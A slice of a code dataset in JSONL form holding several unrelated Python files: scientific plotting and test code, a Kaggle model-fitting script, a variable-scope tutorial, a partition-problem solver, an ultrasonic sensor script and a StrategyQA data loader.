Single Frequency failed\")\n \n#-----------------------------------------------------------------------------#\n\nclass TestHeadingAccuracy(unittest.TestCase):\n\n def test_heading_accuracy_calc(self):\n angles, sy_values = spin_dynamics.load_test_data()\n retina_signal = spin_dynamics.RetinaSignal(\n 40, angles=angles, sy_values=sy_values)\n\n heading_accuracy = spin_dynamics.HeadingAccuracy(retina_signal, 1000)\n output = heading_accuracy.lower_bound_error(\n retina_signal, 1.0E6, num_threads=12, gpu_flag=True)\n\n self.assertTrue(output < 0.95 and output > 0.85, \n \"Heading Accuracy GPU calculation failed\")\n\n##-----------------------------------------------------------------------------#\n##-----------------------------------------------------------------------------#\n\nif __name__ == \"__main__\":\n unittest.main()\n\n\n\n\n\n\n\n\n","repo_name":"hghiscock/spin_dynamics","sub_path":"gpu_tests.py","file_name":"gpu_tests.py","file_ext":"py","file_size_in_byte":4469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6459269549","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nfrom utility import *\nfrom sklearn.feature_extraction import text\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.svm import SVR\nimport cfg\n\n\n\ndef build_model(titles,X1,X3,X4,titles_test,X1_test,X3_test,X4_test,y,weights=None,params=[400,10,0.0],top_words=10):\n '''\n X1: query lenght,title lenght,description presetn flag,number of words from query that also occured in title,\n compression distance between query and title ,1 - edit distance between query and title,\n 1 - average(maximum edit distance between word from query and every word from title),\n last word from query present in title flag,ratio of words from query that also occured in title\n X3: Stanislav's features\n X4: Mikhail's features\n params list: [Number of SVD components, C in SVR, gamma in SVR]\n '''\n #get features from extended queries\n if top_words==10:\n X5 = np.loadtxt(cfg.path_features + 'train_ext_counts_top10.txt')\n X5_test = np.loadtxt(cfg.path_features + 'test_ext_counts_top10.txt')\n queries_ext = np.array(pd.read_csv(cfg.path_features + 'train_ext_top10.csv')['query'])\n queries_ext_test = np.array(pd.read_csv(cfg.path_features + 'test_ext_top10.csv')['query'])\n elif top_words==15:\n X5 = np.loadtxt(cfg.path_features + 'train_ext_counts_top15.txt')\n X5_test = np.loadtxt(cfg.path_features + 'test_ext_counts_top15.txt')\n 
queries_ext = np.array(pd.read_csv(cfg.path_features + 'train_ext_top15.csv')['query'])\n queries_ext_test = np.array(pd.read_csv(cfg.path_features + 'test_ext_top15.csv')['query'])\n else:\n print('Generate features for extended queries. top10 or top 15.')\n print(1/0)\n \n df_train = pd.DataFrame(np.c_[queries_ext,titles],columns=['query','product_title'])\n df_test = pd.DataFrame(np.c_[queries_ext_test,titles_test],columns=['query','product_title'])\n train_qt = list(df_train.apply(lambda x:'%s %s' % (x['query'],x['product_title']),axis=1))\n test_qt = list(df_test.apply(lambda x:'%s %s' % (x['query'],x['product_title']),axis=1))\n \n \n tfv = text.TfidfVectorizer(min_df=10, max_features=None, \n strip_accents='unicode', analyzer='char',token_pattern=r'\\w{1,}',\n ngram_range=(1, 5), use_idf=1,smooth_idf=1,sublinear_tf=1,\n stop_words = 'english')\n \n tfv.fit(train_qt)\n X2 = tfv.transform(train_qt)\n X2_test = tfv.transform(test_qt)\n svd = TruncatedSVD(n_components=params[0])\n mms = MinMaxScaler()\n \n X = np.c_[svd.fit_transform(X2),X1,X4,X3,X5]\n X_test = np.c_[svd.transform(X2_test),X1_test,X4_test,X3_test,X5_test]\n \n X=mms.fit_transform(X)\n X_test = mms.transform(X_test)\n \n clf = SVR(C=params[1],gamma=params[2],cache_size=2048,kernel='rbf')\n clf.fit(X,y,sample_weight=weights)\n p = clf.predict(X_test)\n return p\n\ntrain = pd.read_csv(cfg.path_train).fillna(\"\")\ntest = pd.read_csv(cfg.path_test ).fillna(\"\")\nidx = test.id.values.astype(int)\ny = train.median_relevance.values\n\nX1, weights, titles = (np.loadtxt(cfg.path_features + 'train_counts.txt'),\n np.array(pd.read_csv(cfg.path_features + 'weights.csv'))[:,0],\n np.array(pd.read_csv(cfg.path_features + 'titles_clean.csv'))[:,0])\nX1_test, titles_test = (np.loadtxt(cfg.path_features + 'test_counts.txt'),\n np.array(pd.read_csv(cfg.path_features + 'titles_test_clean.csv'))[:,0])\n\n\nX4 = np.loadtxt(cfg.path_features + 'X_additional_tr.txt')\nX4_test = np.loadtxt(cfg.path_features + 'X_additional_te.txt')\n\nX3 = np.loadtxt(cfg.path_features + 'ssfeas4train.txt')\nX3_test = np.loadtxt(cfg.path_features + 'ssfeas4test.txt')\n\nnp.random.seed(seed=22)\np1 = build_model(titles,X1,X3,X4,titles_test,X1_test,X3_test,X4_test,y,weights=weights,params=[300,8,0.15],top_words=10)\n\np2 = build_model(titles,X1,X3,X4,titles_test,X1_test,X3_test,X4_test,y,weights=weights,params=[400,4,0.20],top_words=15)\n\nnp.savetxt(cfg.path_features + 'dmitry_model1.txt',p1)\nnp.savetxt(cfg.path_features + 'dmitry_model2.txt',p2)\n","repo_name":"geffy/kaggle-crowdflower","sub_path":"fit_models_dmitry.py","file_name":"fit_models_dmitry.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"52"} +{"seq_id":"456569605","text":"import time\nimport h5py\nimport os, sys\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.table import Table\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\nfrom .utils import bin_at_resolution\n\n__all__ = ['stacked_transits', 'transmission_spectrum', 'transit_residuals',\n 'mission_spectra']\n\ndef stacked_transits(time, wavelength, flux, variance, colors,\n centers=np.flip(np.linspace(0.85, 2.55, 15)),\n offset=0.05, offset_delta=0.005, figsize=(8,14),\n text=True, time_ind=230, linestyle=''):\n\n wave_offset = 0.5\n\n x = 0\n\n fig, ax = plt.subplots(figsize=figsize)\n fig.set_facecolor('w')\n rms = np.zeros(len(centers))\n grid = np.zeros((len(centers), len(flux)))\n\n for i, 
center in enumerate(centers):\n q = np.where((wavelength>=center-wave_offset) &\n (wavelength<=center+wave_offset) &\n (np.nansum(variance,axis=0) < 1e7))[0]\n\n spec = np.nansum(flux[:,q],axis=1)/1e6\n yerr = np.sqrt(np.nansum(variance[:,q]**2,axis=1))/1e6\n\n rms[i] = np.sqrt(np.nansum(spec[:100]**2)/100)\n\n yerr /= np.nanmedian(spec)\n spec /= np.nanmedian(spec)\n\n ax.errorbar(time,\n spec-offset,\n yerr=yerr, linestyle=linestyle, c=colors[x],\n marker='.', label=np.round(center,2))\n grid[i] = spec\n\n if text:\n ax.text(x=time[time_ind], y=np.nanmedian(spec[210:])-offset,\n s='{} $\\mu$m'.format(np.round(center,2)),\n fontsize=16)\n\n offset -= offset_delta\n x+=int(256/len(centers)-1)\n return fig, rms, grid\n\ndef plot_type_scatter(w, d, we, de, ax, kwargs):\n \"\"\" Helper function for scatter-type plots. \"\"\"\n ax.errorbar(w, d, xerr=we, yerr=de, marker='.', **kwargs)\n return\n\ndef plot_type_fill_between(w, d, de, ax, kwargs):\n \"\"\" Helper function for fill_between-type plots. \"\"\"\n kwargs.pop('alpha', None)\n ax.plot(w, d, alpha=1, **kwargs)\n kwargs['lw'] = 0\n kwargs['label'] = ''\n ax.fill_between(w, d-de, d+de, alpha=0.4, **kwargs)\n return\n\ndef transmission_spectrum(wavelength, depth, wave_err, depth_err,\n plot_type='scatter', ax=None,\n **kwargs):\n \"\"\"\n Plots a given transmission spectrum.\n\n Parameters\n ----------\n wavelength : np.ndarray\n Array of wavelength data.\n depth : np.ndarray\n Array of measured transit depths.\n wave_err : np.ndarray\n Errors or binsize of each wavelength the transit depth was evaluated\n over.\n depth_err : np.ndarray\n Errors on the measured transit depth.\n plot_type : str, optional\n The way to plot the transmission spectrum. Default is 'scatter' (will\n plot each measured depth as an individual point). Other option is\n 'fill_between' (plots a line with shading for the depth error).\n ax : matplotlib.axes._subplots.AxesSubplot, optional\n Subplot to plot the transmission spectrum on. Default is None.\n \"\"\"\n if ax is None:\n fig, ax = plt.subplots(figsize=(14,4))\n else:\n fig = ax.figure # reuse the parent figure so the return value below is always defined\n\n if plot_type.lower() == 'scatter':\n plot_type_scatter(wavelength, depth, wave_err, depth_err,\n ax, kwargs) # the helpers take the kwargs dict as a positional argument\n\n elif plot_type.lower() == 'fill_between':\n plot_type_fill_between(wavelength, depth, depth_err, ax,\n kwargs)\n else:\n return('plot_type not implemented. Please select between \"scatter\"\\\n and \"fill_between\".')\n\n return fig\n\n\ndef ers_transmission_spectra(table, order, color, label, ax, alpha=0.4, lw=3,\n upper_lim2=0.85, plot_type='fill_between',\n binned=True, R=100, ms=10):\n \"\"\"\n Plotting all of the beautiful transmission spectra from the ERS program.\n\n Parameters\n ----------\n table : astropy.table.Table\n Table with the wavelength (`wave`), wavelength error (`wave_err`),\n transit depth (`dppm`), transit depth error (`dppm_err`), and order\n (`order`) as columns.\n order : int\n Which NIRISS order to plot. Options are 1 and 2.\n color : str\n Color to plot the transmission spectrum in.\n label : str\n Line label for the plot legend.\n ax : matplotlib.axes._subplots.AxesSubplot\n Subplot to plot the transmission spectrum on.\n alpha : float, optional\n How transparent to make the fill_between shading. Default is 0.4.\n lw : float, optional\n How thick to make the central line. Default is 3.\n upper_lim2 : float, optional\n The longest wavelength to evaluate for Order 2. Default is 0.85.\n plot_type : str, optional\n The way to plot the transmission spectrum. 
Default is 'fill_between'\n (plots a line with shading for the depth error). Other option is\n 'scatter' (will plot each measured depth as an individual point).\n binned : bool, optional\n Whether or not to bin the transmission spectrum to a given resolution\n before plotting. Default is True.\n R : int, optional\n The resolution to bin the transmission spectrum to. Default is 100.\n Recommended R = 100 for the Order 1 and R = 50 for Order 2.\n \"\"\"\n # Create masks for each order from the table (it's easier to plot the\n # orders separately)\n if order==1:\n q = table['order'] == order\n elif order==2:\n q = (table['order']==order) & (table['wave']<upper_lim2)\n else:\n return('order must equal 1 or 2.')\n\n # Bins the spectrum if binned == True\n if binned:\n out = bin_at_resolution(table['wave'][q], table['dppm'][q],\n table['dppm_err'][q], R=R)\n else:\n out = [table['wave'], table['dppm'], table['dppm_err']]\n\n # Plots the spectrum\n if plot_type == 'fill_between':\n plot_type_fill_between(out[0], out[1], out[2], ax,\n kwargs={'lw':lw, 'alpha':alpha,\n 'zorder':10, 'color':color,\n 'label':label})\n\n elif plot_type == 'scatter':\n plot_type_scatter(out[0], out[1], np.zeros(len(out[1])), out[2],\n ax=ax,\n kwargs={'alpha':1, 'label':label,\n 'zorder':10, 'color':color,\n 'linestyle':'', 'ms':ms})\n else:\n return('plot_type not implemented. Please select between \"scatter\"\\\n and \"fill_between\".')\n\n return\n\ndef transit_residuals(time, flux, flux_err, residuals, residuals_err, color,\n model=None, ax=None, size=\"20%\", pad=0, index1=0,\n index2=0, resid_lims=[-1000,1000], xlim=[-3,3],\n lc_lims=[0.975, 1.001], labelx=False, labelxticks=False,\n xlabel=None, labelyticks=False):\n \"\"\"\n Helper function to create subplot with a transit and the residuals\n underneath.\n\n Parameters\n ----------\n time : np.ndarray\n Array of times.\n flux : np.ndarray\n Array of fluxes.\n flux_err : np.ndarray\n Array of flux errors.\n residuals : np.ndarray\n Array of residuals between the light curve and best-fit model.\n residuals_err : np.ndarray\n Array of errors on the residuals.\n color : str\n What color to plot the data in.\n model : np.ndarray, optional\n Best-fit transit model to overplot. Default is None (i.e. the model\n will not be overplotted).\n ax : matplotlib.axes._subplots.AxesSubplot, optional\n The subplot to plot the data on. Default is None (i.e. will create its\n own figure).\n size : str, optional\n The percent split between the main light curve and the residuals. Default\n is '20%'.\n pad : float, optional\n The amount of padding between the light curve and residuals subpanels.\n Default is 0.\n index1 : int, optional\n If looping through several columns, this will help with setting/removing\n axes labels and ticklabels. Default is 0. Would be \"i\" in the first loop.\n index2 : int, optional\n If looping through several rows, this will help with setting/removing\n axes labels and ticklabels. Default is 0. 
Would be \"j\" in the second loop.\n \"\"\"\n if ax is None:\n fig, ax = plt.subplots(figsize=(10,6))\n\n divider = make_axes_locatable(ax)\n ax2 = divider.append_axes(\"bottom\", size=size, pad=pad)\n ax.figure.add_axes(ax2)\n\n ax.errorbar(time, flux, yerr=flux_err, marker='.', linestyle='',\n color=color)\n\n if model is not None:\n ax.plot(time, model, 'k', zorder=3)\n\n ax2.errorbar(time, residuals, yerr=residuals_err,\n marker='.', linestyle='', color=color)\n\n #if index1==0:\n if labelxticks == False:\n ax2.set_xticklabels([])\n if labelyticks == False:\n ax.set_yticklabels([])\n\n if index2==0:\n ax2.set_ylabel('Residuals', fontsize=20)\n\n if index2 > 0:\n ax2.set_yticklabels([])\n if index1==1 and index2==0:\n ax2.set_ylabel('Residuals', fontsize=20)\n if labelx:\n ax2.set_xlabel('Time from Mid-Transit [hrs]', fontsize=24)\n\n ax.set_xticks([])\n ax2.set_ylim(resid_lims)\n ax.set_ylim(lc_lims)\n ax.set_xlim(xlim)\n ax2.set_xlim(xlim)\n\n return\n","repo_name":"afeinstein20/nirhiss","sub_path":"src/nirhiss/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":9445,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"30682307980","text":"print('1----------------------------------------------\\n')\nspam = 42 # global variable\n\ndef eggs():\n spam = 42 #local varaible\n\nprint('Some code here:')\nprint('Some more code:')\n\n\nprint('\\n2--------------------------------------------\\n')\ndef spam():\n eggs = 99\n\nspam()\nprint(eggs) # name 'eggs' will not defined #local variable cant use in the global scope\n\nprint('\\n3-------------------------------------------\\n')\n\ndef a():\n eggs = 99\n bacon()\n print(eggs)\n\ndef bacon():\n ham = 101\n eggs = 0 \n\na()# local scope cant use varaible in other local scope\n\nprint('\\n4-------------------------------------------\\n')\n\ndef b():\n print(eggs)\n\neggs = 42\n\nb() # global variable can be use in local scope\n\nprint('\\n5-------------------------------------------\\n')\n\ndef c():\n eggs = 'Hello'\n print(eggs)\n\neggs = 42\nprint(eggs)\n\nc()\n\nprint('\\n6-------------------------------------------\\n')\n\ndef d():\n global eggs # let python know this variable is for global scope\n eggs = 'Hello'\n print(eggs)\n\neggs = 42\nprint(eggs)\n\nd()\n","repo_name":"AlanTeeWeiLoon/Python-Programming-Fundamental-for-Beginner-","sub_path":"Section 3 - Functions/global_local_variable_example.py","file_name":"global_local_variable_example.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33867042107","text":"\"\"\"\nExample usage:\npython3 draw_specific_element.py /media/juliocesar/04968D53968D4660/Millenium/projects/flores/DJI_0289_alto IMG_1\n\"\"\"\n\nimport sys\nimport os\nimport cv2\nimport pandas as pd\n\nclass DrawElement:\n def __init__(self, root_path, id_):\n self.images_src = os.path.join(root_path, 'Images')\n self.csv_path = os.path.join(root_path, 'data.csv')\n self.id = id_ + '.jpg'\n self.run()\n\n def run(self):\n df = pd.read_csv(self.csv_path, index_col='Filename')\n id_info = df.loc[self.id]\n org_img = id_info['Original']\n xmin, xmax = id_info['xmin'], id_info['xmax']\n ymin, ymax = id_info['ymin'], id_info['ymax']\n img = cv2.imread(os.path.join(self.images_src, org_img))\n cv2.rectangle(img, (xmin, ymin), (xmax, ymax), (0, 255, 0), 10)\n window_name = '{} - {}'.format(self.id, id_info['Class'])\n cv2.namedWindow(window_name, 
cv2.WINDOW_NORMAL)\n cv2.imshow(window_name, img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n DrawElement(sys.argv[1], sys.argv[2])","repo_name":"jcgarciaca/annotations_analysis","sub_path":"draw_specific_element.py","file_name":"draw_specific_element.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1817550807","text":"from sys import stdin\n\n## DP approach\n\n## ToDO\n\ndef isSubsetSumDP(arr, n, s1, s2):\n\n matrix = [[[True for z in range(n+1)] for y in range(s1+1)] for x in range(s2+1)]\n\n for i in range(s1+1):\n for j in range(s2+1):\n for k in range(n+1):\n if j == 0:\n matrix[i][j][k] = True\n elif (j != 0 and k == 0):\n matrix[i][j][k] = False\n else:\n matrix[i][j][k] = matrix[i][j-1]\n\n return matrix\n\n\n\n\n# A recursive Python3 program for partition problem\n\n# A utility function that returns\n# true if there is a subset of\n# arr[] with sun equal to given sum\ndef isSubsetSum(arr, n, s1, s2, memoize_arr):\n #print(memoize_arr)\n # Base Cases\n if (s1 == 0 and s2 == 0) :\n return True\n if n == 0 and (s1 != 0 or s2 != 0):\n return False\n\n \"\"\" The memoize array stores the value and will be used again instead of computing multiple times\n The condition >= 0 is to ignore the indices which can be negative\n \"\"\"\n if (s1 >= 0 and s2 >= 0):\n\n if (memoize_arr[n-1][s1-1][s2-1] != -1):\n return memoize_arr[n-1][s1-1][s2-1]\n\n # print(\"----Index = \", n)\n # print(\"part_1 =\", arr, n - 1, s1, s2)\n # print(\"part_2 =\", arr, n - 1, s1 - arr[n - 1], s2)\n # print(\"part_3 =\", arr, n - 1, s1, s2 - arr[n - 1])\n\n ''' else, check if sum can be obtained by any of \n the following \n So for three parts each number has three options: either you pick it and put into the first part,\n pick it and put into the second part or you don't pick it and it goes into the first part.\n '''\n if (s1 >= 0 and s2 >= 0):\n memoize_arr[n-1][s1-1][s2-1] = (isSubsetSum(arr, n-1, s1, s2,memoize_arr) or\n isSubsetSum(arr, n-1, s1-arr[n-1],s2,memoize_arr) or\n isSubsetSum(arr,n-1,s1,s2-arr[n-1],memoize_arr))\n return memoize_arr[n-1][s1-1][s2-1]\n else:\n return (isSubsetSum(arr, n-1, s1, s2,memoize_arr) or\n isSubsetSum(arr, n-1, s1-arr[n-1],s2,memoize_arr) or\n isSubsetSum(arr,n-1,s1,s2-arr[n-1],memoize_arr))\n\n\n# Returns true if arr[] can be partitioned in three\n# subsets of equal sum, otherwise false\ndef findPartion(arr):\n # Calculate sum of the elements in array\n n = len(arr)\n part_sum = sum(arr)//3\n memoize_arr = [[[-1 for z in range(part_sum + 1)] for y in range(part_sum + 1)] for x in range(n + 1)]\n # If sum is not divisible by 3 or the maximum element in the array is greater than the part_sum or the length is less than 3\n if sum(arr) % 3 != 0 or max(arr) > part_sum or len(arr) < 3:\n return False\n\n part_sum1 = part_sum\n part_sum2 = part_sum\n return isSubsetSum(arr, n, part_sum1, part_sum2,memoize_arr)\n\n\n#print(findPartion([7,7,7]))\n\n#Driver program to test above function\n# for values, answer in (\n# ((20,), 0),\n# ((7, 7, 7), 1),\n# ((3, 3, 3), 1),\n# ((3, 3, 3, 3), 0),\n# ((3,1,1,2,2),1),\n#\n# ):\n# print(findPartion(values), answer)\n\n\n\n\nif __name__ == '__main__':\n input_n, *input_values = list(map(int, stdin.read().split()))\n assert input_n == len(input_values)\n result = findPartion(input_values)\n if result:\n print('1')\n else:\n 
print('0')\n","repo_name":"patell11/DataStructuresAndAlgorithms_SanDiego","sub_path":"Algorithmic Toolbox1/Dynamic Programming/Partitioning Souvenirs/partition.py","file_name":"partition.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74304825445","text":"# import RPi.GPIO as GPIO\n# from EmulatorGUI import GPIO\nimport SimulRPi.GPIO as GPIO\nimport time\n\n# Set up GPIO pins\nTRIG = 16 # GPIO pin for ultrasonic sensor trigger\nECHO = 17 # GPIO pin for ultrasonic sensor echo\nMOTOR_PIN = 12 # GPIO pin for vibrating motor\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(TRIG, GPIO.OUT)\nGPIO.setup(ECHO, GPIO.IN)\nGPIO.setup(MOTOR_PIN, GPIO.OUT)\n\n# Initialize variables\nwindow_size = 5 # Moving average window size\ndistances = [0] * window_size # Circular buffer for distances\nindex = 0 # Index of the current distance in the circular buffer\n\n# Helper function to compute moving average\ndef moving_average(distances):\n return sum(distances) / len(distances)\n\n# Helper function to alert user with motor\ndef alert_user():\n GPIO.output(MOTOR_PIN, GPIO.HIGH)\n time.sleep(0.5)\n GPIO.output(MOTOR_PIN, GPIO.LOW)\n\n# Wait for sensor to settle\nGPIO.output(TRIG, False)\nprint(\"Waiting for sensor to settle...\")\ntime.sleep(2)\n\ndef depth_estimation():\n # 'index' is reassigned below, so it must be declared global; otherwise\n # 'distances[index]' raises UnboundLocalError on the first iteration\n global index\n while True:\n # Trigger ultrasonic sensor\n GPIO.output(TRIG, True)\n time.sleep(0.00001)\n GPIO.output(TRIG, False)\n \n # Measure pulse duration (initialize both timestamps so they are\n # defined even if a polling loop body never runs)\n pulse_start = pulse_end = time.time()\n while GPIO.input(ECHO) == 0:\n pulse_start = time.time()\n \n while GPIO.input(ECHO) == 1:\n pulse_end = time.time()\n \n pulse_duration = pulse_end - pulse_start\n \n # Convert pulse duration to distance\n distance = pulse_duration * 17150\n \n # Update circular buffer\n distances[index] = distance\n index = (index + 1) % window_size\n \n # Compute moving average of distances\n moving_avg = moving_average(distances)\n \n # Check for sudden change in depth\n if abs(distance - moving_avg) > 10:\n print(\"Sudden change detected!\")\n alert_user()\n \n # Print distance\n print(\"Distance:\", round(distance, 2), \"cm\")\n \n # Wait before next measurement\n time.sleep(0.1)\n\nif __name__ == \"__main__\":\n try:\n depth_estimation()\n except KeyboardInterrupt:\n GPIO.cleanup()\n print(\"Depth program stopped by user. GPIO cleanup completed.\")\n\n\"\"\"\n In this code, we use a circular buffer to store the last window_size distance measurements and compute the moving average of those measurements. We then check for a sudden change in depth by comparing the current distance to the moving average, and if the difference is greater than a threshold (in this case, 10 cm), we alert the user with the vibrating motor. The alert_user function simply turns on the motor for half a second before turning it off again.\n\nNote that this is just an example code and you may need to adjust the moving average window size and threshold to fit your specific requirements.
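For example (an added, hypothetical walk-through, not part of the original note): with window_size = 5 and a buffer holding [100, 100, 100, 100, 100] cm, a new reading of 60 cm differs from the 100 cm moving average by 40 cm, which exceeds the 10 cm threshold and triggers alert_user().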
Also, make sure to properly connect and configure the vibrating motor to the GPIO pin before running the code.\n\"\"\"","repo_name":"Sudhansh6/Navicane","sub_path":"Code/depth.py","file_name":"depth.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15185729257","text":"class Solution:\n def sumOfDigits(self, A):\n #this method will return the sum of the digits of a number\n if A == 0:\n return 0\n else:\n return (A % 10) + self.sumOfDigits(A//10)\n \n # @param A : integer\n # @return an integer\n def solve(self, A):\n #we will return True(1) if the recursive sum of the digits is 1, else return False(0)\n #Here we will make use of the sumOfDigits method\n if A == 1:\n return 1\n else:\n n = self.sumOfDigits(A)\n while n > 9:\n n = self.sumOfDigits(n)\n if n == 1:\n return 1\n else:\n return 0\n\n#test\ns = Solution()\nans = s.solve(83557)\nassert ans == 1\n\nans = s.solve(1291)\nassert ans == 0","repo_name":"jaikishanEngg/Advanced-DSA-ScalerAcademy","sub_path":"Recursion/Q2_IsMagic.py","file_name":"Q2_IsMagic.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"33572922889","text":"import os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\nimport tensorflow as tf\nimport numpy as np\nimport random\nimport json\nimport copy\n\nfrom transformers import BertTokenizer\n\nclass StrategyQALoader:\n '''\n\n '''\n def __init__(self, filepath, tokenizer, is_test=False, shuffle=False, max_seq_len=512, mode:str=\"sigmoid\", is_token_type_ids: bool=True):\n\n self.filepath = filepath\n self.tokenizer = tokenizer\n self.is_test = is_test\n self.shuffle = shuffle\n self.max_seq_len = max_seq_len\n self.is_token_type_ids = is_token_type_ids\n self.mode = mode\n assert mode.lower() != \"softmax\", f\"The softmax function has not been implemented.\"\n\n self.data = None\n self.facts = []\n self.question = []\n self.idx = [] # each id will be a string, e.g., 3d0f8824ea83ddcc9ab03055658b89d3\n self.label = []\n\n self.data = []\n with open(filepath, \"r\") as f:\n self.data = json.load(f)\n\n for example in self.data:\n self.facts.append(\" \".join(example[\"facts\"]))\n self.question.append(example[\"question\"])\n self.idx.append(example[\"qid\"])\n self.label.append(example[\"answer\"])\n\n assert len(self.facts) == len(self.question)\n assert len(self.facts) == len(self.idx)\n assert len(self.facts) == len(self.label)\n\n self.processed_data = list(zip(self.idx, self.question, self.facts, self.label))\n assert len(self.facts) == len(self.processed_data)\n print(f\"len(processed_data): {len(self.processed_data)}\")\n\n def _shuffle(self):\n random.shuffle(self.processed_data)\n\n def _label_to_int(self, label: str, choice: str):\n if label == choice: return 1\n else: return 0\n\n def __call__(self, batch_size):\n if self.shuffle: self._shuffle()\n #[label, idx, stem, choice, text]\n\n batch_counter = 0\n batch_input = [] # [[senta, sentb], [senta, sentb]]\n idx_list = []\n labels = []\n for i, example in enumerate(self.processed_data):\n # example: [0] is idx, [1] is question, [2] is facts, and [3] is label/answer\n sentence_a, sentence_b = example[2], example[1]\n\n batch_input.append([sentence_a, sentence_b])\n idx_list.append(example[0]) # each item in the list will be a list of two numbers. 
[exidx, qidx]\n batch_counter += 1\n if not self.is_test:\n assert isinstance(example[3], bool)\n labels.append([1 if example[3] is True else 0])\n if batch_counter % batch_size == 0:\n tok_str_ = self.tokenizer.batch_encode_plus(batch_input,\n add_special_tokens=True, padding=\"max_length\",\n max_length=self.max_seq_len, truncation=\"only_first\")\n # truncation=True)\n batch_counter = 0\n batch_input = []\n\n tok_str_[\"input_ids\"] = tf.cast(tf.convert_to_tensor(tok_str_[\"input_ids\"]), dtype=tf.dtypes.int32)\n tok_str_[\"attention_mask\"] = tf.cast(tf.convert_to_tensor(tok_str_[\"attention_mask\"]),\n dtype=tf.dtypes.int32)\n if self.is_token_type_ids:\n tok_str_[\"token_type_ids\"] = tf.cast(tf.convert_to_tensor(tok_str_[\"token_type_ids\"]),\n dtype=tf.dtypes.int32)\n\n idx_list_ = tf.convert_to_tensor(idx_list, dtype=tf.dtypes.string)\n idx_list = []\n\n if not self.is_test:\n labels_ = labels # store the values of the labels before resetting in the next line.\n labels = []\n labels_ = tf.cast(tf.convert_to_tensor(labels_), dtype=tf.dtypes.int8)\n\n if self.is_test:\n yield idx_list_, tok_str_\n else:\n yield idx_list_, tok_str_, labels_\n\n # if there are still samples in batch_input then output them as follows; i.e., in a smaller batch size.\n if len(batch_input) != 0:\n tok_str_ = self.tokenizer.batch_encode_plus(batch_input,\n add_special_tokens=True, padding=\"max_length\",\n max_length=self.max_seq_len, truncation=\"only_first\")\n # truncation=True)\n\n batch_input = [] # technically not needed here.\n\n tok_str_[\"input_ids\"] = tf.cast(tf.convert_to_tensor(tok_str_[\"input_ids\"]), dtype=tf.dtypes.int32)\n tok_str_[\"attention_mask\"] = tf.cast(tf.convert_to_tensor(tok_str_[\"attention_mask\"]),\n dtype=tf.dtypes.int32)\n if self.is_token_type_ids:\n tok_str_[\"token_type_ids\"] = tf.cast(tf.convert_to_tensor(tok_str_[\"token_type_ids\"]),\n dtype=tf.dtypes.int32)\n\n idx_list_ = tf.convert_to_tensor(idx_list, dtype=tf.dtypes.string)\n idx_list = []\n\n if not self.is_test:\n labels_ = labels # store the values of the labels before resetting in the next line.\n labels = []\n labels_ = tf.cast(tf.convert_to_tensor(labels_), dtype=tf.dtypes.int8)\n\n if self.is_test:\n yield idx_list_, tok_str_\n else:\n yield idx_list_, tok_str_, labels_\n\n if self.is_test:\n yield None, None\n else:\n yield None, None, None\n\nif __name__ == \"__main__\":\n\n is_test = False\n tokenizer = BertTokenizer.from_pretrained(\"bert-base-cased\")\n dataLoader = StrategyQALoader(filepath=\"/large_data/StrategyQA/strategyqa/data/strategyqa/dev.json\",\n tokenizer=tokenizer,\n is_test=is_test)\n\n\n dataLoader.shuffle = False\n break_ = 100000000\n counter = 0\n if not is_test:\n for idx, example, label in dataLoader(batch_size=8):\n print(f\"idx: {idx}\\n\"\n f\"example: {example}\\n\"\n #f\"example-input_ids: {example['input_ids']}\\n\"\n f\"example: {tokenizer.batch_decode(example['input_ids'])}\\n\"\n f\"label: {label}\")\n if counter == break_: break\n counter += 1\n else:\n for idx, example in dataLoader(batch_size=8):\n print(f\"idx: {idx}\\n\"\n f\"example: {example}\\n\"\n f\"example: {tokenizer.batch_decode(example['input_ids'])}\\n\")\n if counter == break_: break\n counter += 1\n","repo_name":"KobeKnowles/Neuromodulation-Gated-Transformer","sub_path":"data_loaders/StrategyQA.py","file_name":"StrategyQA.py","file_ext":"py","file_size_in_byte":6801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74749487204","text":"import 
